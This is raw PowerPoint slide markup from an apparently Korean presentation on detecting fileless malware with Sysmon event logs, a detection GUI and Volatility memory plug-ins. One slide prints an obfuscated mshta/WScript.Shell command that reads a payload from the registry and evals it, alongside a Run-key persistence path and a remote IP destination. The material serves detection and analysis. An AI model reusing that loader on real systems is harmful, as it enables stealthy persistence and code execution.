            <a:chExt cx="6762266" cy="174734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9BD8CF7-E504-4F52-8EFE-5F9C22F08ED5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7778028" y="6845938"/>
              <a:ext cx="2971800" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>EventID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PID : 1992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7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endParaRPr lang="ko-KR" altLang="en-US" sz="24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6DC65C-2ADE-4DD8-944E-A5FE481D88A0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9930194" y="6861336"/>
              <a:ext cx="4610100" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Psname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>regsvr32.exe</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PPID : 1418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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2400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502978A-5814-4BBE-8F04-D9AF287968CE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1101359" y="4562111"/>
            <a:ext cx="6629345" cy="3366789"/>
            <a:chOff x="6315075" y="3903650"/>
            <a:chExt cx="4972050" cy="2438533"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="그림 34" descr="텍스트이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{938CE4FC-5ECA-47BC-8D8A-EE46C3131E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84"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6315075" y="3903650"/>
              <a:ext cx="4962525" cy="890754"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="36" name="그림 35" descr="텍스트이(가) 표시된 사진&#10;&#10;자동 생성된 설명">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBF23831-1D88-4E02-8B4D-B4164C50C5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182"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6324600" y="4686300"/>
              <a:ext cx="4962525" cy="1655883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A63F860-1140-4871-83DA-A4D4AA109562}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="643050" y="3631004"/>
            <a:ext cx="105645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0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>DestinationPort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> : http://66.117.14.117/</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea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3AF9A7E-0898-411B-97A5-60DE0AE3546C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9222318" y="2105923"/>
            <a:ext cx="6500590" cy="1295400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:srgbClr val="1A30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F6206DF-C55A-4751-8BDA-3A2A7565284A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9341268" y="2176953"/>
            <a:ext cx="6762266" cy="1747347"/>
            <a:chOff x="7778028" y="6845938"/>
            <a:chExt cx="6762266" cy="174734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B528C1D-DBBA-4891-B0F1-949AC6F01DC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7778028" y="6845938"/>
              <a:ext cx="2971800" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>EventID</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : 1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PID : 1992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7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endParaRPr lang="ko-KR" altLang="en-US" sz="24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0B54DB6-F447-42B3-93B7-462E40E1205A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9930194" y="6861336"/>
              <a:ext cx="4610100" cy="17319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base" latinLnBrk="0" hangingPunct="1"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200" dirty="0" err="1">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>Psname</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t> : </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="3200" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>regsvr32.exe</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="base" latinLnBrk="0" hangingPunct="1"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200" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="black"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                </a:rPr>
                <a:t>PPID : 1418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7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endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="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9B439A79-78BF-44A2-9DC3-C5BDFB3F6EB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9144001" y="3493403"/>
            <a:ext cx="84581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sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>HKEY_CURRENT_USER\Software\Microsoft\Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>\CurrentVersion\Run</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="24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40CEADB-0415-4583-866E-E13AA8AE44A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10363200" y="4663976"/>
            <a:ext cx="6847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0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Mshta</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>:nV5hbdhze="3z";i51c=new%20</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>ActiveXObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WScript.Shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>");QSkHJw2Nf="shxMpY";knbN34=i51c.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>RegRead</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>("HKCU\\software\\af8f327fbd\\ee6cc6ea"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>qE6pYHB="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0" err="1">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>wGNeTfq</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>";eval(knbN34</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" b="0" i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>KTK7meKaV="15xN";</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0">
              <a:latin typeface="+mn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D6408878-10BA-4990-B7A2-4A2CFB4B782D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9677400" y="4663976"/>
            <a:ext cx="0" cy="4977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D325DC6E-F5B9-458C-A0D2-20F40DB37C83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9677400" y="5161734"/>
            <a:ext cx="48251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CBED627-B908-4309-8F42-1046BDC76B2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8752331" y="8735079"/>
            <a:ext cx="8458198" cy="523217"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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E5BC279-F163-4A80-B541-43F020744041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9344088" y="8735079"/>
            <a:ext cx="7274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EventID12, 13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Rule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에 의해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8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개의 부분 탐지</a:t>
            </a:r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8B53931B-F6D0-46A2-A773-3E9DF5CB9E43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="305711" y="5815834"/>
            <a:ext cx="456289" cy="515543"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1A3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516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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="10287000" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Event Analysis : GUI</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun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E9ADA4E-999F-4969-9F22-A0CD0B14E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74" y="1881989"/>
            <a:ext cx="10859626" cy="816437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C8AF939-4902-4AAC-AA8D-0E3D4E19E91E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12344400" y="3771900"/>
            <a:ext cx="48607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/>
              <a:t>탐지를 기준으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>30</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>분간의 이벤트 로그 개수를 그래프로 시각화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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1DC7D8-D595-4874-89CE-3EBC1D150891}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12344400" y="5555882"/>
            <a:ext cx="48607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/>
              <a:t>악성이 탐지된 프로세스들을 최상위 프로세스부터 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>tree </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>구조로 표현</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR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7FBBBE3-3029-4E20-9087-A6BC83F13084}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12344400" y="7339864"/>
            <a:ext cx="48607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/>
              <a:t>오른쪽 표에 탐지된 내용들을 나타내고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2400" dirty="0"/>
              <a:t>, tree</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>에서 강조 </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="24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AE56066-5690-4661-A044-C9C35C092435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="3813942"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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1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06ED544-AD49-427C-8A2F-40D3A314BE22}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9448800" y="3771900"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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1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6DAA4A3-9DBA-40FD-916B-64663F8524C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="5601301"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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2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7DAD05E-1F17-4338-9167-2CD84FDAD349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11384066" y="7381906"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="1A30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3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744B891-EEE4-428C-9D17-C55A0BC7C27C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3505200" y="6592953"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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2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2FA8AB0-7B1A-45E2-BE4A-B54EF7F9A12C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7848600" y="8170861"/>
            <a:ext cx="789700" cy="746911"/>
          </a:xfrm>
          <a:prstGeom prst="ellipse">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="76200">
            <a:solidFill>
              <a:srgbClr val="F94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3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552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227" y="979321"/>
            <a:ext cx="95360" cy="576160"/>
            <a:chOff x="855847" y="930687"/>
            <a:chExt cx="95360" cy="576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90600" y="876300"/>
            <a:ext cx="13809534" cy="10056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5400" kern="0" spc="-200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Memory Analysis : Volatility Plug-in</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
              <a:ea typeface="THERodongSinmun" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Google Shape;248;p16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF8842D5-EDDE-4F1A-8E5C-366F75211E35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3348607" y="2762808"/>
            <a:ext cx="1133269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메모리</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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상에</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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존재하는</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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파일리스</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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악성코드의</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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의심행위</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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수집</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="32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endParaRPr sz="3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97A6408-7C9D-45B4-9D69-21A63F099216}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1371600" y="4228403"/>
            <a:ext cx="2985638" cy="5147696"/>
            <a:chOff x="1677509" y="4263005"/>
            <a:chExt cx="2781813" cy="5147696"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="순서도: 수행의 시작/종료 30">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D90D2655-1BC1-41A2-A971-4F2A20D04D86}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1899179" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>pstree</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="16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Calibri"/>
                <a:sym typeface="Calibri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5500D6B-1F7C-4292-9D50-833DAE89CA31}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1677509" y="5143498"/>
              <a:ext cx="2781813" cy="426720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400" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="+mn-ea"/>
                  <a:cs typeface="Malgun Gothic"/>
                  <a:sym typeface="Malgun Gothic"/>
                </a:rPr>
                <a:t>프로세스 상관분석을 보여주는 플러그인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C03E8EB-9E3E-4418-BA26-4C9E93EA272F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4613069" y="4228403"/>
            <a:ext cx="2985638" cy="5147697"/>
            <a:chOff x="4668897" y="4263005"/>
            <a:chExt cx="2781813" cy="5147697"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="32" name="순서도: 수행의 시작/종료 31">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D06D5D40-645A-4957-9121-F82DAA808948}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4890568" y="4263005"/>
              <a:ext cx="2338472" cy="650658"/>
            </a:xfrm>
            <a:prstGeom prst="flowChartTerminator">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="1A305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에스코어 드림 4 Regular"/>
                  <a:ea typeface="에스코어 드림 4 Regular"/>
                  <a:cs typeface="Calibri"/>
                  <a:sym typeface="Calibri"/>
                </a:rPr>
                <a:t>psxview</a:t>
